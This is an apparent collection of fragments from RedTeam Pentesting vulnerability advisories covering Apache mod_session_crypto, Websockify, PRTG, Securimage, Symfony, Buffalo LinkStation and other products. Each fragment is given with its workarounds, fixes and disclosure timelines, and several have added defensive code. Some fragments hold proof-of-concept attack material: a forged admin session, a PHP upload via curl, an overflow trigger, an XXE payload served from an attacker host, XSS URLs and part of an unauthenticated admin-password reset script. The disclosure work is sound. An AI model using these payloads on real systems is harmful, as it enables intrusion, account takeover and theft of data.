The problem was fixed in the Git master branch in commit ccc4232 [2]. Alternatively, the stable version v1.2.1 and earlier are not affected.

Security Risk
=============

The vulnerability is deemed to be of medium risk. The number of installations that are configured in the way described should be rather low, as it is not the recommended way of installing PDNS Manager and the development version of PDNS Manager needs to have been used. However, if such a configuration is found, arbitrary PHP code can be run on the system. Depending on the system's configuration, this can lead to a full compromise of the host running PDNS Manager.

Timeline
========

2017-05-16 Vulnerability identified
2017-06-16 Customer approved disclosure to vendor
2017-06-27 Vendor notified
2017-06-29 Vendor released fixed version
2017-07-05 Advisory released

References
==========

[0] https://pdnsmanager.lmitsystems.de/
[1] https://github.com/loewexy/pdnsmanager/commit/3bf4e2874a0120d99ae02a1a9f4a6e74094c7dc1
[2] https://github.com/loewexy/pdnsmanager/commit/ccc423291cb0e6f8c58849f71821e7425b7c030e
[FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
    Decrypted session: b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'

    real    6m43.088s
    user    0m15.464s
    sys     0m0.976s

In this sample application, the username and a timestamp are included in the session data. The Python script can also be used to encrypt a new session containing the username "admin":

    $ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
    Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
    RU= username=admin
    Encrypted session: sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY

    real    3m38.002s
    user    0m8.536s
    sys     0m0.512s

Sending this newly encrypted session to the server shows that the username is now "admin":

    $ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
    zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
    your username is admin

Workaround
==========

Use a different means to store the session, e.g. in a database by using mod_session_dbd.

Fix
===

Update to Apache HTTP version 2.4.25 (see [2]).

Security Risk
=============

Applications which use mod_session_crypto usually store sensitive values in the session and rely on an attacker's inability to decrypt or modify the session. Successful exploitation of the padding oracle vulnerability subverts this mechanism and allows the construction of sessions with arbitrary attacker-specified content. Depending on the application, this may completely subvert the application's security. Therefore, this vulnerability poses a high risk.

Timeline
========

2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new release and inquires whether the patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released

References
==========

[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html
[FD] [RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
malicious LESS file to the Less compiler. This vulnerability can be exploited in various scenarios:

* If an application takes user input and feeds it to the Less compiler, an attacker can gain code execution and compromise the system running the Less compiler.
* If a user downloads and compiles a malicious LESS file, an attacker can compromise the user's system.

RedTeam Pentesting discovered and exploited this vulnerability in a penetration test. However, it became increasingly clear after consultation with the LESS development team that the encountered situation is likely relatively rare. The reason for that is that LESS files are usually compiled on the server side once and most often do not contain user-supplied content. In cases where LESS files do contain or consist of user-supplied content, the browser-based implementation [3] of the Less compiler is the typical choice.

Still, the official Less documentation does not mention the compiler's feature to evaluate inline JavaScript and the consequential risks. Thus, users are likely to be unaware that embedding user-controlled content into a LESS file may result in arbitrary code execution. Therefore, RedTeam Pentesting decided to release this advisory to bring the users' attention to this important fact.

Timeline
========

2016-03-18 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-31 Customer approved disclosure to vendor
2016-06-24 Advisory sent to vendor
2016-07-05 Vendor debates whether it is a security issue or a documentation issue
2016-07-12 Vendor opts for waiting until release 3.0, which disables the option to compile JavaScript by default
2016-07-14 RedTeam downrates the vulnerability from high risk to low to acknowledge that it is more of a setup issue
2016-11-24 Still no release 3.0, advisory released

References
==========

[0] https://github.com/less/less.js
[1] http://web.archive.org/web/20140202171923/http://www.lesscss.org/
[2] http://www.bennadel.com/blog/2638-executing-javascript-in-the-less-css-precompiler.htm
[3] http://lesscss.org/#client-side-usage
[FD] [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution
hp

Requesting this file with the URL

    http://example.com/relay-1-5-3/uploads/redteam_info.php

will then yield the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a temporary file, a regular POST request containing only the code to be executed is sufficient to exploit this vulnerability. The following invocation of curl uploads the same PHP script, which invokes the function 'phpinfo()':

    $ curl --silent --include --data '<?php phpinfo(); ?>' \
      'http://example.com/relay-1-5-3/upload.pl?redteam.php'

In the server's upload directory, the file temp_redteam.php contains the data that was sent to the upload.pl script:

    $ ls relay-1-5-3/uploads/
    stats_redteam.php.txt  temp_redteam.php
    $ cat temp_redteam.php
    <?php phpinfo(); ?>

Requesting this file with the URL

    http://example.com/relay-1-5-3/uploads/temp_redteam.php

will again yield the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary files to the affected web server, e.g. in order to easily execute PHP commands with the privileges of the web server.

Workaround
==========

One possible workaround would be to prevent the execution of files in the upload directory and deliver them as attachments instead.

Fix
===

None.

Security Risk
=============

This vulnerability allows unauthenticated attackers to upload arbitrary files to the affected system. In the web server's and project's default configuration, it is very likely that this may be used to execute arbitrary commands with the privileges of the web server process. This is possible without authentication, thereby providing no barrier for attackers. It is therefore rated as a high risk. Since this software is quite old and not well maintained, it is likely that additional vulnerabilities exist. However, this was not further evaluated.

Timeline
========

2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published
[FD] [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow
Advisory: Websockify: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered a buffer overflow vulnerability in the C implementation of Websockify, which allows attackers to execute arbitrary code.

Details
=======

Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"websockify was formerly named wsproxy and was part of the noVNC project. At the most basic level, websockify just translates WebSockets traffic to normal TCP socket traffic. Websockify accepts the WebSockets handshake, parses it, and then begins forwarding traffic between the client and the target in both directions."
(from the project's readme)

More Details
============

For each new connection, websockify forks and calls the function do_handshake() to receive a client's WebSocket handshake. The following excerpt shows some of the source code responsible for receiving the client's data from the socket file descriptor:

    ws_ctx_t *do_handshake(int sock) {
        char handshake[4096], response[4096], sha1[29], trailer[17];
        [...]
        offset = 0;
        for (i = 0; i < 10; i++) {
            len = ws_recv(ws_ctx, handshake+offset, 4096);
            if (len == 0) {
                handler_emsg("Client closed during handshake\n");
                return NULL;
            }
            offset += len;
            handshake[offset] = 0;
            if (strstr(handshake, "\r\n\r\n")) {
                break;
            }
            usleep(10);
        }
        [...]

As can be seen in the listing, the function ws_recv() is called in a loop to read data from the client's socket into the stack-allocated buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096 bytes are read from the socket and stored in the handshake buffer. The variable 'offset' determines the position in the buffer at which the received data is written. In each iteration, the value of 'offset' is increased by the number of bytes received. If the received data contains the string "\r\n\r\n", which marks the end of the WebSocket handshake data, the loop is terminated. Otherwise, the loop is terminated after a maximum of 10 iterations. The do_handshake() function returns early if no more data can be received from the socket.

By forcing websockify to iterate multiple times, attackers can exploit this behaviour to write data past the space allocated for the handshake buffer, thereby corrupting adjacent memory.

Proof of Concept
================

The following curl command can be used to trigger the buffer overflow:

    $ curl http://example.com/$(python -c 'print "A"*5000')

Providing a generic exploit for this vulnerability is not feasible, as it depends on the server-side environment websockify is used in as well as the compiler used and its flags. However, during a penetration test it was possible to successfully exploit this buffer overflow vulnerability and to execute arbitrary commands on the server.

Workaround
==========

Use the Python implementation of websockify.

Fix
===

The vulnerability has been fixed in commit 192ec6f [0].

Security Risk
=============

Successful exploitation of the vulnerability allows attackers to execute arbitrary code on the affected system. It is therefore rated as a high risk.

Timeline
========

2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published

References
==========

[0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9
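As an added illustration (not websockify's code and not the change in commit 192ec6f), the quoted loop rewritten in C with each read bounded by the space left in the buffer, beside a helper that computes how far the original, unbounded loop writes for a request of a given size. The socket call ws_recv() is replaced by a constructed in-memory stand-in, fake_recv(), so the block runs offline:

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define HANDSHAKE_BUF 4096   /* size of the stack buffer in the quoted do_handshake() */
#define MAX_ITER      10     /* iteration cap of the quoted loop */

/* Constructed stand-in for ws_recv(): serves a client request from memory,
 * returning at most `want` bytes per call and 0 once nothing is left. */
typedef struct {
    const char *data;
    size_t len;
    size_t pos;
} fake_client_t;

ssize_t fake_recv(fake_client_t *c, char *buf, size_t want)
{
    size_t left = c->len - c->pos;
    size_t n = left < want ? left : want;
    memcpy(buf, c->data + c->pos, n);
    c->pos += n;
    return (ssize_t)n;
}

/* Bytes the original loop stores into handshake[] for a request of
 * `request_len` bytes that never contains "\r\n\r\n": each of the 10 reads
 * may add up to 4096 bytes regardless of `offset`, and a NUL is written after
 * the last byte. Anything above 4095 bytes therefore lands beyond the buffer. */
size_t unbounded_write_extent(size_t request_len)
{
    size_t max_data = (size_t)MAX_ITER * HANDSHAKE_BUF;
    size_t stored = request_len < max_data ? request_len : max_data;
    return stored + 1;
}

/* Bounded variant: every read is capped at the free space left in the buffer
 * (one byte reserved for the NUL), so a client that keeps sending without
 * terminating the handshake is refused instead of overwriting the stack.
 * Returns the handshake length, or -1 (client closed), -2 (buffer exhausted
 * before "\r\n\r\n" arrived) or -3 (no terminator within MAX_ITER reads). */
int read_handshake_bounded(fake_client_t *c, char *handshake, size_t cap)
{
    size_t offset = 0;
    for (int i = 0; i < MAX_ITER; i++) {
        size_t space = cap - 1 - offset;
        if (space == 0)
            return -2;
        ssize_t len = fake_recv(c, handshake + offset, space);
        if (len == 0)
            return -1;
        offset += (size_t)len;
        handshake[offset] = '\0';
        if (strstr(handshake, "\r\n\r\n") != NULL)
            return (int)offset;
    }
    return -3;
}

int main(void)
{
    static const char ok_req[] =
        "GET / HTTP/1.1\r\nHost: example.com\r\nUpgrade: websocket\r\n\r\n";
    char buf[HANDSHAKE_BUF];
    fake_client_t good = { ok_req, strlen(ok_req), 0 };
    printf("normal handshake: %d bytes\n",
           read_handshake_bounded(&good, buf, sizeof buf));

    /* Request shaped like the advisory's curl command: 5000 bytes, no terminator. */
    char big[5000];
    memset(big, 'A', sizeof big);
    fake_client_t evil = { big, sizeof big, 0 };
    printf("original loop would write %zu bytes into a %d-byte buffer\n",
           unbounded_write_extent(sizeof big), HANDSHAKE_BUF);
    printf("bounded loop result: %d (rejected)\n",
           read_handshake_bounded(&evil, buf, sizeof buf));
    return 0;
}
```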
[FD] [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor
Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor

Authenticated users who can create new HTTP XML/REST Value sensors in PRTG Network Monitor can read local files on the PRTG host system via XML external entity expansion.

Details
=======

Product: Paessler PRTG Network Monitor
Affected Versions: 14.4.12.3282
Fixed Versions: 16.2.23.3077/3078
Vulnerability Type: XML External Entity Expansion
Security Risk: medium
Vendor URL: https://www.paessler.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-012
Advisory Status: published
CVE: CVE-2015-7743
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7743

Introduction
============

"PRTG Network Monitor is the powerful and comprehensive network monitoring solution from Paessler AG. It monitors your network using a whole range of technologies and assures the availability of network components and measures traffic and usage. PRTG saves costs by avoiding outages, optimizing connections, saving time and controlling service level agreements (SLAs)."
(from the vendor's website) [1]

More Details
============

An attacker with access to a PRTG Network Monitor account with sufficient privileges to create or configure XML/REST sensors can read files stored on the system's local disk. These sensors are intended to query a URL and, depending on the configuration, check whether there is a valid response or read the value of a specific XML node in the document that is returned. This functionality is vulnerable to XML external entity expansion.

Proof of Concept
================

In order to exploit this vulnerability, an HTTP XML/REST Value sensor has to be set up to access an attacker-controlled URL and to read the value of a specific XML node, for example:

    https://attacker.example.com/xeee-hosts.xml

The XML document "xeee-hosts.xml" contains an external entity that uses the "SYSTEM" keyword to load a local file as the content of the "hosts" entity:

    <!DOCTYPE root [
      <!ENTITY hosts SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
    ]>
    <root>&hosts;</root>

Since the XML parser of PRTG Network Monitor evaluates external entities, the XML parser fetches the file "C:\Windows\System32\drivers\etc\hosts" from the disk of the local system and inserts its content into the "root" node of the XML document. If the sensor is configured to return the value of that "root" node, the contents of that file are displayed in the web interface of PRTG Network Monitor. This discloses the contents of the file to attackers who otherwise would not be able to read local files.

Fix
===

Update to a version greater than or equal to 16.2.23.3077/3078 (see [2]).

Security Risk
=============

Attackers who can create new HTTP XML/REST sensors in PRTG Network Monitor are able to use the XML external entity expansion to read files on the local system. Depending on the data stored on the vulnerable system, this vulnerability may pose a high risk. However, as attackers are required to already have valid user credentials for the application, the vulnerability is only rated to have a medium risk potential.

Timeline
========

2015-08-28 Vulnerability identified in PRTG Network Monitor
2015-09-04 Customer approved disclosure of vulnerability
2015-09-04 CVE ID requested
2015-09-24 CVE ID requested again
2015-10-07 CVE ID assigned
2015-10-21 Vendor contacted
2016-04-04 Vendor released fixed version
2016-05-31 Advisory released

References
==========

[1] https://www.paessler.com
[2] https://www.paessler.com/prtg/history/stable
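As an added illustration (constructed here, not PRTG's code), a C pre-parse guard of the kind a sensor that fetches XML from an untrusted URL can apply: any markup declaration such as "<!DOCTYPE" or "<!ENTITY" outside comments and CDATA sections is rejected before a value is extracted, so a document carrying an external entity like the "hosts" entity above never reaches a parser that would resolve it. extract_node_text() is a deliberately minimal hypothetical helper standing in for the sensor's node lookup:

```c
#include <stdio.h>
#include <string.h>

/* Fail-closed guard for XML fetched from an untrusted URL: returns 1 if the
 * document contains any markup declaration ("<!DOCTYPE", "<!ENTITY", ...)
 * outside comments and CDATA sections, i.e. anything that could declare an
 * external entity; 0 if it consists of plain element markup only.
 * An unterminated comment or CDATA section is rejected as well. */
int xml_has_markup_declaration(const char *doc)
{
    const char *p = doc;
    while ((p = strstr(p, "<!")) != NULL) {
        if (strncmp(p, "<!--", 4) == 0) {               /* comment: skip it */
            const char *end = strstr(p + 4, "-->");
            if (end == NULL)
                return 1;
            p = end + 3;
        } else if (strncmp(p, "<![CDATA[", 9) == 0) {   /* CDATA section: skip it */
            const char *end = strstr(p + 9, "]]>");
            if (end == NULL)
                return 1;
            p = end + 3;
        } else {                                        /* DOCTYPE, ENTITY, anything else */
            return 1;
        }
    }
    return 0;
}

/* Minimal value extraction in the spirit of an XML/REST value sensor: copies
 * the text between <name> and </name> into out (cap bytes including the NUL).
 * Returns the text length, -1 if the document was refused by the guard above,
 * -2 if the node is missing or the text does not fit. Hypothetical helper:
 * it handles only simple documents without attributes or nested `name` nodes. */
int extract_node_text(const char *doc, const char *name, char *out, size_t cap)
{
    char open[80], close[80];

    if (xml_has_markup_declaration(doc))
        return -1;
    if (strlen(name) > 70)
        return -2;
    snprintf(open, sizeof open, "<%s>", name);
    snprintf(close, sizeof close, "</%s>", name);

    const char *start = strstr(doc, open);
    if (start == NULL)
        return -2;
    start += strlen(open);
    const char *end = strstr(start, close);
    if (end == NULL)
        return -2;

    size_t len = (size_t)(end - start);
    if (len + 1 > cap)
        return -2;
    memcpy(out, start, len);
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    char value[128];
    /* Constructed documents: a benign sensor response and one shaped like the
     * advisory's xeee-hosts.xml (the file path is the one named in the advisory). */
    const char *benign = "<root><status>ok</status></root>";
    const char *xxe = "<!DOCTYPE root [\n"
                      "<!ENTITY hosts SYSTEM \"file:///C:/Windows/System32/drivers/etc/hosts\">\n"
                      "]>\n<root>&hosts;</root>";

    int n = extract_node_text(benign, "status", value, sizeof value);
    printf("benign document: %d -> \"%s\"\n", n, n >= 0 ? value : "");
    printf("external entity document: %d (refused)\n",
           extract_node_text(xxe, "root", value, sizeof value));
    return 0;
}
```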
[FD] [RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2
Advisory: Cross-site Scripting in Securimage 3.6.2 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Securimage CAPTCHA software, which allows attackers to inject arbitrary JavaScript code via a crafted URL. Details === Product: Securimage Affected Versions: >= 3.2RC1 Fixed Versions: 3.6.4 Vulnerability Type: Cross-site Scripting Security Risk: high Vendor URL: https://www.phpcaptcha.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-002 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Securimage is an open-source free PHP CAPTCHA script for generating complex images and CAPTCHA codes to protect forms from spam and abuse. It can be easily added into existing forms on your website to provide protection from spam bots. It can run on most any web server as long as you have PHP installed, and GD support within PHP. Securimage does everything from generating the CAPTCHA images to validating the typed code. Audible codes can be streamed to the browser with Flash for the vision impaired." (from the project's homepage) More Details The Securimage download package and GitHub repository include several example scripts to demonstrate the usage of the library. Among these scripts is the file example_form.ajax.php. It returns JavaScript code that includes an unencoded value from the variable $_SERVER['PHP_SELF'] directly embedded into the website. 
In Securimage versions from 3.2RC1 to 3.5 the following code is vulnerable:

function processForm() {
    new Ajax.Request('', {
        method: 'post',
        parameters: $('contact_form').serialize(),
        onSuccess: function(transport) {

In Securimage versions from 3.5.2 to 3.6.2 the following code is vulnerable:

function processForm() {
    jQuery.ajax({
        url: '',
        type: 'POST',
        data: jQuery('#contact_form').serialize(),
        dataType: 'json',
    }).done(function(data) {

The problem here is that the value of the variable $_SERVER['PHP_SELF'] can, depending on the configuration of the web server, often be manipulated by an attacker to include special characters like apostrophes.

Proof of Concept
================

The following URL can be used to demonstrate the vulnerability for Securimage versions from 3.2RC1 to 3.5 on a web server with a vulnerable configuration:

http://www.example.com/example_form.ajax.php/');}alert('RedTeam Pentesting');a=function(){a('

Securimage versions from 3.5.2 to 3.6.2 can be exploited with the following URL:

http://www.example.com/example_form.ajax.php/'});}alert('RedTeam Pentesting');a=function(){a({x:'

The result is a notification showing the text "RedTeam Pentesting". The value of the variable $_SERVER['PHP_SELF'] is embedded verbatim into the HTML source code of the resulting web page.

Workaround
==========

The file example_form.ajax.php should be deleted from the Securimage directory on a web server.

Fix
===

Update to version 3.6.4.

Security Risk
=============

This security vulnerability is rated as a high risk. It allows executing arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many possibilities for further attacks against these users. Since Securimage is usually used as a software library to provide CAPTCHA functionality for web applications, the vulnerability could be used to exploit all web applications hosted on the same domain.
Timeline
========

2016-02-03 Vulnerability identified
2016-02-12 Customer approved disclosure to vendor
2016-02-23 CVE number requested
2016-02-24 CVE number not assigned, "non-prioritized product"
2016-03-02 Vendor contacted
2016-03-03 Vendor releases fixed version
2016-03-22 Advisory released
[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
Device.Services.VoiceService.1.VoiceProfile.1.Enable  Enabled
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.Enable  Enabled
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.X_AVM-DE_UseAuthUsername  0
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.X_AVM-DE_CLIRType  5
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.PSTNFailOver  0
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.DTMFMethod  RFC2833
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.OutboundProxy  sip.alice-voip.de
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.UserAgentDomain  sip.alice-voip.de
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.RegistrarServer  sip.alice-voip.de
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.ProxyServer  sip.alice-voip.de
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthPassword  0241463x
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.DirectoryNumber  463x
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line.1.SIP.AuthUserName  49241463x
39315850

[msg24] CPE -> ACS B:
http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
393158501
0

[msg25] CPE <- ACS B:
[empty]

Workaround
==========

o2 implemented countermeasures that prevent attackers from spoofing a victim's IP address in CWMP messages. This prevents attackers from retrieving arbitrary o2 customers' VoIP credentials.

Fix
===

The CPE needs to be properly authenticated when communicating with the ACS. One option of doing so would be to provide the password of the DSL connection. This password is already known to the CPE as it has been entered manually by the customer during the initial setup process.
Security Risk
=============

This vulnerability allows the unauthorised usage of foreign VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending themselves from such an attack. Chances are that the attack will be noticed only by customers who regularly check their invoice. The vulnerability is therefore considered to pose a high risk.

Timeline
========

2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the problem
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI, BSI)
2016-01-08 - Advisory released
[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images
-14 CVE number assigned
2014-11-17 Vendor provided fixed version to RedTeam Pentesting
2015-07-16 Vendor started releasing fixed versions (7490 [0])
2015-10-01 Vendor finished releasing fixed versions (other models)
2016-01-07 Advisory released

References
==========

[0] https://avm.de/service/sicherheitshinweise/
[FD] [RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality
ure, the web application did not assign a new value to the PHPSESSID cookie. If an attacker somehow got in possession of the cookie's value or has successfully set a given cookie value in the user's browser at some point in the past, the attacker is now able to access the web application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' \
    -b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000
[...]
[...]
In hac habitasse platea dictumst
anna_ad...@symfony.com
8/23/15, 10:16 AM
[...]

Workaround
==========

Disable the "Remember Me" login functionality within the configuration file security.yml.

Fix
===

Upgrade to a fixed version if possible, otherwise refer to section Workaround.

Security Risk
=============

The described vulnerability allows an attacker to access a Symfony web application with the attacked user's permissions. The attack requires that the "Remember Me" login functionality is used by the application. Additionally, the attacker either got access to the PHPSESSID cookie value or has successfully set a new value in the user's browser. Because of its requirements, the described vulnerability poses a low risk only. The risk estimation may be increased to medium or high based on the affected web application and the accessible data.

Timeline
========

2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released

References
==========

[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature
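The defect in the advisory above is a login path that keeps the session ID the browser arrived with. The following is an added example, not Symfony's code: a minimal in-memory session store with a remember-me login that either reuses the incoming ID (the vulnerable behaviour) or migrates the session to a freshly generated ID and discards the old one (the fix). The planted ID "redteam" is the cookie value from the advisory; the user name is a constructed sample.

```python
"""Session-ID rotation on authentication (added example, not Symfony's code)."""
import secrets


class SessionStore:
    """In-memory session table: session id -> session attributes."""

    def __init__(self, regenerate_on_login):
        self._sessions = {}
        self.regenerate_on_login = regenerate_on_login

    def start(self):
        """Create an anonymous session and return its server-generated id."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None}
        return sid

    def accept_client_id(self, sid):
        """Accept a client-supplied id as a new anonymous session.

        Mirrors a server that trusts whatever PHPSESSID the browser sends
        (the 'PHPSESSID=redteam' cookie above), which is what lets an attacker
        plant a known id in the victim's browser before the victim logs in.
        """
        self._sessions.setdefault(sid, {"user": None})

    def remember_me_login(self, sid, user):
        """Authenticate `user` on session `sid` via the remember-me path.

        Returns the id the client must use from now on. The vulnerable variant
        keeps `sid`; the fixed variant moves the session to a fresh id and
        invalidates the old one, so a planted id never becomes authenticated.
        """
        data = self._sessions.get(sid)
        if data is None:
            raise KeyError("unknown session")
        data["user"] = user
        if not self.regenerate_on_login:
            return sid
        del self._sessions[sid]
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def user_for(self, sid):
        """User bound to `sid`, or None for anonymous or unknown sessions."""
        data = self._sessions.get(sid)
        return data["user"] if data else None


def fixation_succeeds(store, planted_sid="redteam", victim="anna_admin"):
    """Replay the attack from the advisory and report whether it works.

    The attacker plants `planted_sid`, the victim logs in on that session, and
    the attacker then presents the planted id. `victim` is a constructed sample
    user, not an account from the advisory.
    """
    store.accept_client_id(planted_sid)
    store.remember_me_login(planted_sid, victim)
    return store.user_for(planted_sid) == victim


if __name__ == "__main__":
    print("vulnerable store:", fixation_succeeds(SessionStore(regenerate_on_login=False)))
    print("fixed store:     ", fixation_succeeds(SessionStore(regenerate_on_login=True)))
```

In PHP the two halves of this correspond to session.use_strict_mode (which rejects uninitialised IDs and so closes the planting step) and session_regenerate_id(true) on every path that elevates a session, the remember-me auto-login included.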
[FD] [RT-SA-2015-006] Buffalo LinkStation Authentication Bypass
        return False
    if r.status_code != 200:
        sys.stdout.write("bad reply.\n")
        sys.stdout.flush()
        return False
    try:
        reply = json.loads(r.text)
        sid = reply['data'][0]['sid']
    except:
        sys.stdout.write("error while parsing reply.")
        sys.stdout.flush()
        return False
    # do not check success key of JSON reply here.
    # it will most likely be false (user/password wrong)!
    sys.stdout.write("ok.\n")
    sys.stdout.flush()
    return sid

def set_admin_password(url, sid, password):
    headers = {'User-Agent': None}
    payload = {'bufaction': 'setUserSettingsadmin',
               'userName': 'admin',
               'userId': '52',
               'userDesc': 'Built-in account for ' +
                           'administering the system',
               'pwd': args.password,
               'confPwd': args.password,
               'primGroup': 'admin',
               'quota_soft': '',
               'quota_hard': ''}
    cookies = {'webui_session_RedTeam': '%s_en_0' % sid}
    try:
        sys.stdout.write("Trying to set admin password to %s... " % password)
        sys.stdout.flush()
        r = requests.post(url, headers=headers, cookies=cookies,
                          data=payload, verify=False)
    except:
        sys.stdout.write("could not connect to target.\n")
        sys.stdout.flush()
        return False
    if r.status_code != 200:
        sys.stdout.write("bad reply.\n")
        sys.stdout.flush()
        return False
    try:
        reply = json.loads(r.text)
        success = reply['success']
    except:
        sys.stdout.write("error while parsing reply.\n")
        sys.stdout.flush()
        return False
    if success == True:
        sys.stdout.write("ok.\n")
        sys.stdout.flush()
    else:
        sys.stdout.write("failed.\n")
        sys.stdout.flush()
    return success

requests.packages.urllib3.disable_warnings()
url = "https://%s:%s/dynamic.pl" % (args.host, args.port)
sid = get_session_id(url)
if sid == False:
    sys.exit(-1)
if set_admin_password(url, sid, args.password) == True:
    sys.stdout.write("\n")
    sys.stdout.write("Admin password successfully set!\n")
    sys.stdout.write("URL: https://%s:%s/\n" % (args.host, args.port))
    sys.stdout.write("New credentials: admin : %s\n" % args.password)
    sys.exit(0)
else:
    sys.exit(-1)

Workaround
==========

If possible, disable access to the web interface, for example via an ACL in the responsible ethernet switch.

Fix
===

Users should install firmware version 1.71 or higher to ensure proper server-side authentication. In addition, a password should be set for the "guest" user account, which is by default present and enabled, but does not have a password.

Security Risk
=============

This vulnerability allows an unauthenticated attacker to gain administrative privileges on a Buffalo LinkStation. All attached storage devices may then be accessed by the attacker. This puts the available data at risk as confidential information may be disclosed, valuable information destroyed or manipulated. Depending on the firmware of the device, an attacker may also be able to execute malicious code on the LinkStation either via installing a customized firmware image [0] or by exploiting a publicly disclosed remote command injection vulnerability [1]. It is therefore estimated that the vulnerability poses a high risk to anyone who uses an affected device.

Timeline
========

2015-03-30 Vulnerability identified
2015-04-09 Customer approved disclosure to vendor
2015-06-09 Vendor notified
2015-06-09 Vendor responds: vulnerability is fixed in version 1.70
